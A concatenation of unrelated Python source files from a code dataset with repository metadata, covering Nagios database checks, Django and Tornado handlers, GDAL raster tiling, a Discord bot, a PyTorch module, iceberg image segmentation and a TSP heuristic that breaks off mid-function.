        .loc[pandas_df_ratings.loc[:, "user_id"] == 255])
    print("Execution time for PANDAS dataframe indexed by 'user_id'")
    time_test(lambda: pandas_df_ratings_indexed.loc[255])
with contextlib.redirect_stdout(Logger(output_log_path)):
activity_4_1(df_ratings)
# #### Ranking:
# 1. Indexed Pandas Dataframe
# 2. Unindexed Pandas Dataframe
# 3. Indexed Pyspark Dataframe / Unindexed Pyspark Dataframe
# ## Code quality check
# In[16]:
get_ipython().system('flake8-nb result.ipynb')
# ## Safe notebook versioning
# In[17]:
get_ipython().system('jupyter nbconvert result.ipynb --to="python"')
# ## PDF export
# In[ ]:
get_ipython().system('jupyter nbconvert --to webpdf --allow-chromium-download result.ipynb')
| mdavid674/TEST_HEVA | main/result.py | result.py | py | 14,008 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdout",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession.builder.config",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 72,
"usage_type": "attribute"
... |
69903435304 | #!/usr/bin/env python
#
# A script that check fulltextsearch queue in nextcloud
# This works only for Postgres Backend
#
#
# Main Author
# - Filip Krahl <filip.krahl@t-systems.com>
#
# USAGE
#
# See README.md
#
from optparse import OptionParser
import sys
import time
import re
import os
import numbers
try:
import psycopg2
except ImportError as e:
print(e)
sys.exit(2)
def performance_data(perf_data, params):
    """Render Nagios performance-data output, or '' when disabled.

    Each entry in params is (value, name[, warning[, critical]]); missing
    positions are padded with None.
    """
    if not perf_data:
        return ''
    pieces = [" |"]
    for entry in params:
        value, name, warn, crit = (entry + (None, None, None, None))[0:4]
        pieces.append("%s=%s" % (name, str(value)))
        if warn or crit:
            # A threshold of None renders as 0 in the thresholds section.
            pieces.append(";%s;%s" % (warn or 0, crit or 0))
        pieces.append(" ")
    return ''.join(pieces)
def numeric_type(param):
    """Return True if *param* is None or any real number."""
    if param is None:
        return True
    return isinstance(param, numbers.Real)
def check_levels(param, warning, critical, message, ok=[]):
    """Print a Nagios status line and exit with the matching code.

    With numeric thresholds, param is compared against warning/critical;
    otherwise warning/critical/ok are treated as collections of matching
    values.  Exits via sys.exit (0 OK, 1 WARNING, 2 CRITICAL).

    NOTE(review): the mutable default `ok=[]` is shared across calls, and
    the final unexpected-value branch returns 2 instead of exiting like
    every other branch — confirm before relying on the return value.
    """
    if (numeric_type(critical) and numeric_type(warning)):
        if warning >= critical:
            print("WARNING - The warning threshold is greater than critical threshold")
            sys.exit(1)
        elif param >= critical:
            print("CRITICAL - " + message)
            sys.exit(2)
        elif param >= warning:
            print("WARNING - " + message)
            sys.exit(1)
        else:
            print("OK - " + message)
            sys.exit(0)
    else:
        if param in critical:
            print("CRITICAL - " + message)
            sys.exit(2)
        if param in warning:
            print("WARNING - " + message)
            sys.exit(1)
        if param in ok:
            print("OK - " + message)
            sys.exit(0)
        # unexpected param value
        print("CRITICAL - Unexpected value : %d" % param + "; " + message)
        return 2
def main(argv=None):
    """Parse CLI options, connect to Postgres and dispatch the chosen check."""
    p = OptionParser()
    p.add_option('-H', '--host', action='store', type='string', dest='host', default='127.0.0.1', help='The hostname of postgres database')
    p.add_option('-d', '--database', action='store', type='string', dest='database', default='postgres', help='The nextcloud database the fulltextsearch table is inside')
    p.add_option('-t', '--tableprefix', action='store', type='string', dest='tableprefix', default='oc', help='Tableprefix for the nextcloud database')
    p.add_option('-u', '--user', action='store', type='string', dest='user', default='nextcloud', help='The user which has access to nextcloud database')
    p.add_option('-p', '--password', action='store', type='string', dest='password', default='', help='The password of nextcloud db user')
    p.add_option('-P', '--port', action='store', type='string', dest='port', default='5432', help='The port of nextcloud database')
    p.add_option('-D', '--perf-data', action='store_true', dest='perf_data', default=False, help='Enable output of Nagios performance data')
    p.add_option('-A', '--action', type='choice', dest='action', default='connect', help='The action the script should execute',
                 choices=['fts_queue', 'fts_errors', 'connect']
                 )
    p.add_option('-w', '--warning', action='store', dest='warning', default=None, help='Warning threshold')
    p.add_option('-c', '--critical', action='store', dest='critical', default=None, help='Critical threshold')
    options, arguments = p.parse_args()
    host = options.host
    database = options.database
    tableprefix = options.tableprefix
    user = options.user
    password = options.password
    port = options.port
    perf_data = options.perf_data
    action = options.action
    # 0 means "use the action's built-in default threshold".
    warning = int(options.warning or 0)
    critical = int(options.critical or 0)
    # connect to the databse, create cursor and determine connection time
    start = time.time()
    con = psycopg2.connect(database=database, user=user, password=password, host=host, port=port)
    cur = con.cursor()
    conn_time = time.time() - start
    # Each check prints its result and exits via check_levels.
    if action == "fts_queue":
        return check_fts_queue(cur, warning, critical, perf_data, tableprefix)
    elif action == "fts_errors":
        return check_fts_error(cur, warning, critical, perf_data, tableprefix)
    else:
        return check_connect(host, port, database, user, password, warning, critical, conn_time, perf_data)
def check_connect(host, port, database, user, password, warning, critical, conn_time, perf_data):
    """Report how long the Postgres connection took against thresholds."""
    # Fall back to the built-in defaults when no threshold was given.
    warn_threshold = warning or 3
    crit_threshold = critical or 6
    message = "Connection took %.3f seconds" % conn_time
    message += performance_data(perf_data, [(conn_time, "connection_time", warn_threshold, crit_threshold)])
    return check_levels(conn_time, warn_threshold, crit_threshold, message)
def check_fts_queue(cur, warning, critical, perf_data, tableprefix):
    """Count fulltextsearch documents still waiting to be indexed.

    status != 1 marks rows that have not been fully indexed yet.
    """
    warning = warning or 10
    critical = critical or 50
    # NOTE: a table name cannot be a SQL placeholder, so tableprefix is
    # interpolated directly; it must come from trusted configuration.
    select = "select * from {}_fulltextsearch_indexes where status != 1;".format(tableprefix)
    cur.execute(select)
    # len() replaces the original manual counting loop over the rows.
    fts_queue = len(cur.fetchall())
    message = "Documents in queue: %d" % fts_queue
    message += performance_data(perf_data, [("%d" % fts_queue, "documents_pending", warning, critical)])
    cur.close()
    return check_levels(fts_queue, warning, critical, message)
def check_fts_error(cur, warning, critical, perf_data, tableprefix):
    """Count fulltextsearch index rows that recorded an error (err != 0)."""
    warning = warning or 1
    critical = critical or 2
    # NOTE: a table name cannot be a SQL placeholder, so tableprefix is
    # interpolated directly; it must come from trusted configuration.
    select = "select * from {}_fulltextsearch_indexes where err != 0;".format(tableprefix)
    cur.execute(select)
    # len() replaces the original manual counting loop over the rows.
    fts_errors = len(cur.fetchall())
    message = "Index errors: %d" % fts_errors
    # "index_erros" is kept as-is: it is an emitted metric label and
    # renaming it would break existing monitoring dashboards.
    message += performance_data(perf_data, [("%d" % fts_errors, "index_erros", warning, critical)])
    cur.close()
    return check_levels(fts_errors, warning, critical, message)
# NOTE(review): `con` is a local of main(); if this line really sits at
# module level it raises NameError on import — confirm original indentation.
con.close()
if __name__ == "__main__":
    main(sys.argv)
{
"api_name": "sys.exit",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numbers.Real",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 59,... |
74768118503 | from django.http import HttpRequest
from djaveAllowed.models import Allowed
from djaveAllowed.credentials import UserCredentials
from djaveAPI.get_instance import get_instance
from djaveAPI.problem import Problem
from djaveClassMagic.find_models import model_from_name
def get_request_ajax_obj(request, model=None, pk=None):
    """Resolve the single object an AJAX request refers to.

    The identifier may arrive as either "id" or "pk", and the model as
    either "model" or "type" (or be passed in directly) -- both spellings
    are accepted to avoid confusion.
    """
    # Accept both "id" and "pk" as the identifier key.
    pk = pk or get_request_variable(request, 'id', required=False)
    if not pk:
        pk = get_request_variable(request, 'pk', required=True)

    # Accept both "model" and "type" as the model-name key.
    if model:
        model_name = model.__name__
    else:
        model_name = (
            get_request_variable(request.POST, 'model', required=False)
            or get_request_variable(request.POST, 'type', required=True))

    # Deliberately NOT djaveAPI.get_publishable_model: AJAX calls may target
    # objects that are not part of the public API. All that matters here is
    # having a model whose permissions can be checked.
    model = model_from_name(model_name, Allowed)
    credentials = UserCredentials(request.user)

    # Query model.objects rather than model.live: this looks up one specific
    # object, so no "active only" filtering should get in the way.
    return get_instance(model_name, model.objects, pk, credentials)
def get_request_variable(data, variable_name, required=True):
    """Extract *variable_name* from *data*.

    `data` is either a dict-like (e.g. request.POST) or a full request,
    in which case its payload is extracted first. Missing or empty values
    raise Problem when required; otherwise None is returned for a missing
    key and the raw value for a present one.
    """
    if isinstance(data, HttpRequest):
        data = get_data_from_request(data)
    if variable_name in data:
        value = data[variable_name]
        if required and value in (None, ''):
            raise Problem('The {} is required'.format(variable_name))
        return value
    if required:
        raise Problem(
            'This request doesn\'t specify a {}'.format(variable_name))
    return None
def get_data_from_request(request):
    """Return the first non-empty payload among POST, PUT and DELETE.

    Falls through to request.DELETE (even if empty) when none is truthy,
    matching `a or b or c` semantics.
    """
    for payload in (request.POST, request.PUT):
        if payload:
            return payload
    return request.DELETE
| dasmith2/djaveAPI | djaveAPI/get_request_variable.py | get_request_variable.py | py | 2,142 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "djaveClassMagic.find_models.model_from_name",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "djaveAllowed.models.Allowed",
"line_number": 29,
"usage_type": "argument"
},
{
"api_name": "djaveAllowed.credentials.UserCredentials",
"line_number": 30,
... |
43911039109 | import numpy as n
import matplotlib.pyplot as plt
# Rzut ukosny (projectile motion): read initial speed and launch angle,
# print flight statistics and plot velocity, position and trajectory.
v0 = float(input("Podaj V0: "))
# BUGFIX: the angle used to be converted from degrees to radians twice
# (once on input, once again on the next line), corrupting every sin/cos
# value below. Convert exactly once.
kat = float(input("Podaj kat: ")) * n.pi / 180

g = 9.81
time = 2 * v0 * n.sin(kat) / g            # total flight time
hmax = v0**2 * n.sin(kat)**2 / (2 * g)    # maximum height
# BUGFIX: horizontal range is v0^2*sin(2*kat)/g = 2*v0^2*sin(kat)*cos(kat)/g,
# not 2*v0^2*sin(kat)^2/g as previously written.
zasieg = 2 * v0**2 * n.sin(kat) * n.cos(kat) / g

punkty = 100
t = n.linspace(0, time, punkty)
vx = n.full(punkty, v0 * n.cos(kat))      # horizontal speed is constant
vy = v0 * n.sin(kat) - g * t
x = vx * t
y = v0 * t * n.sin(kat) - g * t * t / 2

print("Maksymalna wysokość: ", hmax)
print("Zasieg rzutu: ", zasieg)
print("Czas lotu: ", time)

plt.subplot(131, title="predkosc chwilowa")
plt.plot(t, vx, t, vy)
plt.subplot(132, title="polozenie funkcji w czasie")
plt.plot(t, x, t, y)
plt.subplot(133, title="tor ruchu w rzucie ukosnum ")
plt.plot(x, y)
plt.show()
| AWyszynska/JSP2022 | lista9/zadanie3.py | zadanie3.py | py | 796 | python | pl | code | 0 | github-code | 36 | [
{
"api_name": "numpy.pi",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "numpy.pi",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.sin",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number": 9,
... |
506102860 | """
Split Raster's into tiles
"""
import os
from osgeo import gdal
def nrsts_fm_rst(rst, rows, cols, out_fld, bname):
    """
    Split raster into several rasters

    The number of new rasters is determined by the extent of the input
    raster and the maximum number of rows and cols each new raster may have.

    rst     - path to the input raster
    rows    - maximum rows per tile
    cols    - maximum columns per tile
    out_fld - output folder
    bname   - basename for the tiles ({bname}_{row}{col}.tif)

    Returns the list of created tile rasters.
    """

    from glass.prop.img import rst_epsg
    from glass.wt.rst import ext_to_rst

    # Open Raster
    img = gdal.Open(rst, gdal.GA_ReadOnly)

    # Get EPSG
    epsg = rst_epsg(img)

    # Get raster cellsize
    # NOTE(review): csy is presumably negative (north-up rasters); that is
    # why min Y below is obtained by *adding* rrows * csy -- confirm.
    tlx, csx, xr, tly, yr, csy = img.GetGeoTransform()

    # Get Raster cols and Rows
    rrows, rcols = img.RasterYSize, img.RasterXSize

    # Get Raster max X and min Y (bottom right)
    rmax_x = tlx + (rcols * csx)
    rmin_y = tly + (rrows * csy)

    # Get Number of rasters to be created
    # (round up when the raster is not an exact multiple of the tile size)
    nr_rows = int(rrows / rows)
    nr_rows = nr_rows if nr_rows == rrows / rows else nr_rows + 1

    nr_cols = int(rcols / cols)
    nr_cols = nr_cols if nr_cols == rcols / cols else nr_cols + 1

    # Create new rasters
    newrst = []
    for i in range(nr_rows):
        # TopLeft Y
        _tly = tly + ((rows * csy) * i)
        # BottomRight Y
        _bry = _tly + (csy * rows)

        # If fishnet min y is lesser than raster min_y
        # Use raster min_y
        if _bry < rmin_y:
            _bry = rmin_y

        for e in range(nr_cols):
            # TopLeft X
            _tlx = tlx + ((cols * csx) * e)
            # Bottom Right X
            _brx = _tlx + (csx * cols)

            # If fishnet max x is greater than raster max_x
            # Use raster max_x
            if _brx > rmax_x:
                _brx = rmax_x

            # Create Raster (constant value 1 over the tile extent)
            nrst = ext_to_rst(
                (_tlx, _tly), (_brx, _bry),
                os.path.join(out_fld, f"{bname}_{str(i)}{str(e)}.tif"),
                cellsize=csx, epsg=epsg, rstvalue=1
            )

            newrst.append(nrst)

    return newrst
def split_raster_by_window(rst, ntile_rows, ntile_cols, out_fld):
    """
    Split Raster By Spatial Window

    Cuts *rst* into tiles of at most ntile_rows x ntile_cols pixels using
    gdal_translate's -srcwin option and returns the list of tile paths.
    """

    from glass.pys import execmd
    from glass.pys.oss import fprop
    from glass.prop.df import drv_name

    # Open the raster only to read its pixel dimensions
    src = gdal.Open(rst, gdal.GA_ReadOnly)
    nrows, ncols = src.RasterYSize, src.RasterXSize

    # Tiles keep the input's GDAL driver/format
    drv = drv_name(rst)

    # Output naming: <input filename>_r<row idx>c<col idx><input extension>
    props = fprop(rst, ['ff', 'fn'])
    fn, ff = props['filename'], props['fileformat']

    tiles = []
    for col_idx, xoff in enumerate(range(0, ncols, ntile_cols)):
        for row_idx, yoff in enumerate(range(0, nrows, ntile_rows)):
            outrst = os.path.join(
                out_fld,
                f'{fn}_r{str(row_idx)}c{str(col_idx)}{ff}'
            )
            cmd = ' '.join([
                'gdal_translate', '-of', drv, '-srcwin',
                str(xoff), str(yoff), str(ntile_cols), str(ntile_rows),
                rst, outrst
            ])
            execmd(cmd)
            tiles.append(outrst)

    return tiles
| jasp382/glass | glass/dtt/rst/split.py | split.py | py | 3,146 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "osgeo.gdal.Open",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "osgeo.gdal.GA_ReadOnly",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "glass.prop.img... |
36050038659 | from typing import Optional
from tornado.template import Loader
from web.controllers.utils.errors import handle_errors
from web.controllers.utils.validated import ValidatedFormRequestHandler
from web.schemas import template_schema
from web.services.email.abstract import AbstractEmailService
from web.validation import validate_template_schema
class BaseTemplateRequestHandler(ValidatedFormRequestHandler):
    """Shared wiring for template handlers: stores the Tornado template
    loader and the e-mail service injected by the application router."""

    def initialize(self, template_loader: Loader, email_service: AbstractEmailService):
        self.loader = template_loader
        self.service = email_service
class TemplatesHandler(BaseTemplateRequestHandler):
    """List e-mail templates (GET) and create a new one (POST)."""

    schemas = {"post": template_schema}

    @handle_errors
    async def get(self):
        # Render the listing page with every known template.
        templates = await self.service.list_email_templates()
        page = self.loader.load("templates/templates.html")
        body = page.generate(
            objects=templates, columns=["id", "name"], url_base="/templates/"
        )
        self.write(body)

    @handle_errors
    async def post(self):
        # Validate the submitted form, persist it, then jump to the detail view.
        payload = self.get_data("post")
        validate_template_schema(payload)
        created = await self.service.create_email_template(payload)
        self.redirect(f"/templates/{created['id']}")
class TemplateHandler(BaseTemplateRequestHandler):
    """Show (GET) and update (POST) a single e-mail template."""

    schemas = {"post": template_schema}

    @handle_errors
    async def get(self, template_id: str):
        tpl = await self.service.get_email_template(int(template_id))
        rendered = self.loader.load("templates/template.html").generate(template=tpl)
        self.write(rendered)

    @handle_errors
    async def post(self, template_id: str):
        # Validate, stamp the id from the URL onto the payload, save, re-render.
        payload = self.get_data("post")
        validate_template_schema(payload)
        payload["id"] = int(template_id)
        await self.service.update_email_template(payload)
        await self.get(template_id)
class TemplateFormHandler(BaseTemplateRequestHandler):
    """Render the create/edit form; edit mode pre-fills the stored template."""

    @handle_errors
    async def get(self, template_id: Optional[str] = None):
        if not template_id:
            # Create mode: empty form posting to the collection URL.
            action, initial = "/templates", {}
        else:
            # Edit mode: pre-fill from the stored template.
            action = f"/templates/{template_id}"
            initial = await self.service.get_email_template(int(template_id))
        form = self.loader.load("templates/template_form.html")
        self.write(form.generate(action=action, initial=initial))
| MFrackowiak/sc_r_mailmarketing | web/controllers/template.py | template.py | py | 2,346 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "web.controllers.utils.validated.ValidatedFormRequestHandler",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "tornado.template.Loader",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "web.services.email.abstract.AbstractEmailService",
"line_... |
2623856397 | import discord
import logging
import os
from discord.ext import commands
logger = logging.getLogger('serverlinker')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
initial_extensions = [
'plugins.commands',
'plugins.handlers'
]
bot = commands.AutoShardedBot(command_prefix=commands.when_mentioned_or('$'))
logger.info("""
_________ .____ .__ __
/ _____/ ______________ __ ___________| | |__| ____ | | __ ___________
\_____ \_/ __ \_ __ \ \/ // __ \_ __ \ | | |/ \| |/ // __ \_ __ \\
/ \ ___/| | \/\ /\ ___/| | \/ |___| | | \ <\ ___/| | \/
/_______ /\___ >__| \_/ \___ >__| |_______ \__|___| /__|_ \\\\___ >__|
\/ \/ \/ \/ \/ \/ \/
""")
logger.info("Created by Kelwing#0001")
if __name__ == '__main__':
    # Load every startup cog. A failing cog is logged with its traceback
    # (logger.exception) but does not stop the remaining cogs from loading.
    for ext in initial_extensions:
        logger.info(f"Loading {ext}...")
        try:
            bot.load_extension(ext)
        except Exception:  # broad on purpose: keep the bot booting
            logger.exception(f'Failed to load extension {ext}.')
@bot.event
async def on_ready():
    """Set the bot presence and log once the gateway connection is ready."""
    status = (
        f"Type $help | Serving {len(bot.guilds)} guilds on "
        f"{bot.shard_count} shards"
    )
    await bot.change_presence(activity=discord.Game(status))
    logger.info(f"{bot.user} is now online!")
bot.run(os.environ.get('TOKEN'), reconnect=True)
| Kelwing/DiscordLinkerBot | main.py | main.py | py | 1,599 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "logging.Forma... |
72597561384 | from torch import nn
import torch
class OrderPredictor(nn.Module):
    """Score the 6 possible orderings of three feature vectors.

    Three linear heads embed the ordered pairs (0,1), (0,2) and (1,2);
    the concatenated pair embeddings feed a final linear layer that
    produces one logit per permutation.
    """

    def __init__(self, model_dim):
        super().__init__()
        self.disc_linear = nn.ModuleList([
            nn.Linear(2 * model_dim, model_dim) for _ in range(3)
        ])
        self.final_linear = nn.Linear(3 * model_dim, 6)

    def forward(self, features):
        # features: (batch_size * sampled_num, 3, dim)
        pairs = ((0, 1), (0, 2), (1, 2))
        pair_embeddings = [
            layer(torch.cat((features[:, i], features[:, j]), dim=-1))
            for layer, (i, j) in zip(self.disc_linear, pairs)
        ]
        combined = torch.cat(pair_embeddings, dim=-1)
        return self.final_linear(combined)  # (bs * sampled_num, 6)
def order2target(order):
return {'012': 0, '021': 1, '102': 2, '120': 3, '201': 4, '210': 5}[str(order[0]) + str(order[1]) + str(order[2])] | AwalkZY/CPN | model/sub_modules/auxiliary.py | auxiliary.py | py | 937 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleList",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
18315390523 | # This script does the following:
#
# 1. Steps through all of the shapefiles associated with the aerial photos and
# determines whether the shapefile falls entirely within in the fjord. Photos
# that don't fall entirely within the fjord are excluded from analysis. A file
# titled 'input_files.npy' is created that contains the list of photos to be
# processed.
#
# 2. Steps through all of the photos in the 'input_files.npy' file and
# performs image segmentation. For each it produces a npz file that contains
# the total number of pixels (npixels), an array with the area of each
# individual iceberg (icebergArea), the pixel size (pixArea), and the edges
# of the icebergs (edges) for plotting purposes. It also produces a figure
# to show the results of the image segmentation.
import numpy as np
from matplotlib import pyplot as plt
import matplotlib
import cv2
import glob
import os
from scipy.ndimage.filters import gaussian_filter
import multiprocessing as mp
import timeit
import shapefile
from shapely.geometry import Polygon, Point
plt.ioff()
#%%
def findIcebergs(input_file):
    """Segment icebergs in one aerial photo and save the results.

    Writes <name>_icebergs.npz (npixels, icebergArea, pixArea, edges) and a
    JPEG overlay figure into the photo directory's 'processed' subfolder,
    which main() is expected to have created beforehand.
    """
    # https://machinelearningknowledge.ai/image-segmentation-in-python-opencv/

    print('Processing image ' + os.path.basename(input_file))

    img = cv2.imread(input_file)

    # use value (V channel of HSV)
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    _, _, img = cv2.split(hsv)

    # smooth to remove small icebergs and whitecaps
    img = cv2.GaussianBlur(img,(11,11),0)

    npixels = img.shape[0]*img.shape[1] # store total number of pixels; later store number of pixels in each iceberg
    aspect_ratio = float(img.shape[0])/img.shape[1]

    # pixel size comes from the world file (.jgw) next to the photo;
    # first line is the pixel width, squared to get a pixel area
    with open(input_file[:-3] + 'jgw') as f:
        pixArea = f.readline().rstrip() # find area of pixel for each image
        pixArea = (np.array(pixArea,dtype='float32'))**2
        f.close()

    if np.max(img) > 200: # image contains icebergs!
        # enhance contrast by stretching the image PROBLEM IF NO ICEBERGS!!
        img = cv2.normalize(img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F).astype('uint8')

        # add border to image to detect icebergs along the boundary
        bordersize=1
        img = cv2.copyMakeBorder(img, top=bordersize, bottom=bordersize,
            left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=0 )

        # threshold image
        _, img_ = cv2.threshold(img, 170, 255, cv2.THRESH_BINARY)
        #_, img_ = cv2.threshold(img,40,255, cv2.THRESH_BINARY)

        ## segment using cluster detection, using canny edge detection
        # find edges
        edges = cv2.dilate(cv2.Canny(img_,0,255),None)

        # detect contours: only external contours, and keep all points along contours
        # NOTE(review): the 3-value unpacking matches the OpenCV 3.x
        # findContours signature; OpenCV 4.x returns only 2 values -- confirm
        # the pinned cv2 version.
        _, contours, _ = cv2.findContours(edges.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)

        # remove holes; this command no longer seems necessary?
        #contours = [contours[i] for i in range(len(contours)) if hierarchy[0][i][3] < 0]

        # fill contours on original image
        cv2.drawContours(img, contours, contourIdx=-1, color=(255,255,255),thickness=-1).astype('float32')

        # calculate area of icebergs (in pixels; multiply by pixArea downstream)
        icebergArea = np.zeros(len(contours))
        for k in range(len(icebergArea)):
            icebergArea[k] = cv2.contourArea(contours[k])

    else: # create empty arrays if no icebergs are found
        icebergArea = []
        edges = []

    photo_dir = os.path.dirname(input_file)
    processed_directory = photo_dir + '/processed/'
    np.savez(processed_directory + '/' + os.path.basename(input_file)[:-4] + '_icebergs.npz', npixels=npixels, icebergArea=icebergArea, pixArea=pixArea, edges=edges)

    # diagnostic figure: original photo with detected edges overlaid
    plt.figure(figsize=(15,15*aspect_ratio))
    ax = plt.axes([0,0,1,1])
    img = cv2.imread(input_file)
    RGB_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    ax.imshow(RGB_img)
    if np.sum(icebergArea)>0: # if contains icebergs, plot the edges using a map of the edges (instead of the vectors)
        # strip the 1-pixel border added above before overlaying
        edges_plot = edges[1:-1,1:-1].astype('float32')
        edges_plot[edges_plot==0] = np.nan
        ax.imshow(edges_plot)
    ax.axis('off')
    plt.savefig(processed_directory + '/' + os.path.basename(input_file)[:-4] + '_icebergs.jpg',format='jpg',dpi=300)
    plt.close()
#%%
def main():
    """Build the list of photos fully inside the fjord, then segment them.

    For each flight campaign of the module-level `year`, photo footprints
    are tested against the fjord outline; photos whose footprint lies
    entirely within the fjord are queued and processed in parallel by
    findIcebergs. The per-campaign file list is cached in input_files.npy.
    """
    # fjord outline polygon used to test photo footprints
    fjord = shapefile.Reader('./data/fjord_outline_copy.shp')
    fjord = fjord.shapeRecords()[0]
    fjord_polygon = Polygon(fjord.shape.points)

    campaign_shapefiles = sorted(glob.glob('../HARBORSEAL_' + year + '/footprints/*.shp'))

    input_files_all = [] # input files for all campaigns during the year
    for j in np.arange(0,len(campaign_shapefiles)):
        # campaign id is encoded at a fixed position in the shapefile name
        campaign = campaign_shapefiles[j][-22:-14]
        photo_dir = glob.glob('../HARBORSEAL_' + year + '/JHI/' + campaign + '/*' + campaign + '_photo/')[0]
        processed_directory = photo_dir + 'processed/'
        if not os.path.isdir(processed_directory):
            os.mkdir(processed_directory)

        # footprints of all photos from that campaign
        footprints = shapefile.Reader(campaign_shapefiles[j])

        # reuse a previously computed per-campaign file list when available
        if os.path.exists(photo_dir + '/input_files.npy'):
            input_files = np.load(photo_dir + '/input_files.npy').tolist()
        else:
            input_files = []
            for k in np.arange(0,footprints.numRecords):
                photo = footprints.shapeRecords()[k] # extract footprint from individual photo
                if int(year)<2018:
                    photo_name = photo.record[1] # extract name of individual photo
                else:
                    photo_name = photo.record[0] # extract name of individual photo
                    # seems to be different format for photo.record for older photos
                photo_polygon = Polygon(photo.shape.points) # get polygon boundary
                infjord = fjord_polygon.contains(photo_polygon) # is photo completely within the fjord?
                if infjord==True:
                    input_files = input_files + [photo_dir + photo_name]
            np.save(photo_dir + '/input_files.npy', input_files)
        input_files_all = input_files_all + input_files

    print('Number of files to process: ' + str(len(input_files_all)))
    # one worker per CPU minus one, to keep the machine responsive
    pool = mp.Pool(mp.cpu_count()-1)
    pool.map(findIcebergs, input_files_all)
#%%
if __name__ == '__main__':
    # Time the whole run; `year` is a module-level variable read by main().
    start_time = timeit.default_timer()
    year = '2008' # only processes one year at a time
    main()
    elapsed = timeit.default_timer() - start_time
    print('Elapsed time: ' + str(elapsed/60) + ' min')
| ojiving/iceberg_segmentation | s1_image_segmentation_parallel_with_shapefiles.py | s1_image_segmentation_parallel_with_shapefiles.py | py | 6,975 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.ioff",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "os.path.basename",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
3866986259 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 16 20:47:36 2020
@author: mixmp
"""
import random
import math
import numpy as np
import mpmath
def nearest_neighbour_for_TPS(path):
    """Read a TSPLIB file at *path*, build a tour with the nearest-neighbour
    heuristic from a random start node, and print the tour and its cost.

    Supports EUC_2D, ATT and GEO edge-weight types. Returns None; all
    output goes to stdout.
    """
    ###################function for reading the tps document########################33
    def read_tps(path):
        # Parse a TSPLIB file: name, dimension, edge-weight type,
        # coordinates, and the full pairwise distance matrix.
        with open(path, 'r') as f:
            content = f.read().splitlines()#content is a list whose every element contains every line
            #line of the txt document
        cleaned = [x.lstrip() for x in content if x != ""]#The gaps that exist at the start of every element
        #are removed
        for element in cleaned:#I find the line which strats with NAME word and then
            #I take the name of the problem
            if element.startswith("NAME"):
                a=element
        if len(a.split())==2:#this happens when : is next to the word NAME
            name=a.split()[1]
        elif len(a.split())==3:#this happens when there is a gap between NAME and :
            name=a.split()[2]
        i=0
        flag=False
        while flag==False:
            if cleaned[i]=="NODE_COORD_SECTION" or cleaned[i]=="DISPLAY_DATA_SECTION":
                loc=i#loc is the number of the row of the txt doument where it is written NODE_COORD_SECTION or
                #NODE_COORD_SECTION and after this line there are the coordinates of the problem up to
                #the line where it is written EOF
                flag=True
            i=i+1
        cleaned1=[]#A list where I save the lines of the txt document which contain the coordinates after
        #having applied split method to every line
        for i in range((loc+1),(len(cleaned)-1)):
            cleaned1.append(cleaned[i].split())
        for element in cleaned:#I find the line which strats with DIMENSION word and then
            #I take the number after the DIMENSION
            if element.startswith("DIMENSION"):
                a=element
        if len(a.split())==2:#this happens when : is next to the word DIMENSION
            dimension=int(a.split()[1])
        elif len(a.split())==3:#this happens when there is a gap between DIMENSION and :
            dimension=int(a.split()[2])
        for element in cleaned:
            if element.startswith("EDGE_WEIGHT_TYPE"):
                a=element
        if len(a.split())==2:#this happens when : is next to EDGE_WEIGHT_TYPE
            EDGE_WEIGHT_TYPE=a.split()[1]
        elif len(a.split())==3:#this happens when there is a gap between EDGE_WEIGHT_TYPE and :
            EDGE_WEIGHT_TYPE=a.split()[2]
        coordinates=[]
        coordinates1=[]
        for i in cleaned1:
            coordinates.append((int(i[0]),float(i[1]),float(i[2])))#coordinates is a list which contains the id
            #number and dimensions of every point
            coordinates1.append((float(i[1]),float(i[2])))#coordinates is a list which contains
            #the dimensions of every point
        #dimension=len(cleaned)-(loc+1)-1#A second way to find the dimensions of the problem
        ##########In the following lines I compute for every pair of points, the distance of them
        ##########and I create a nxn matrix which contains the distance of every 2 points of the problem
        ##########The type of the distance is given by the edge weight type
        if EDGE_WEIGHT_TYPE== "EUC_2D":
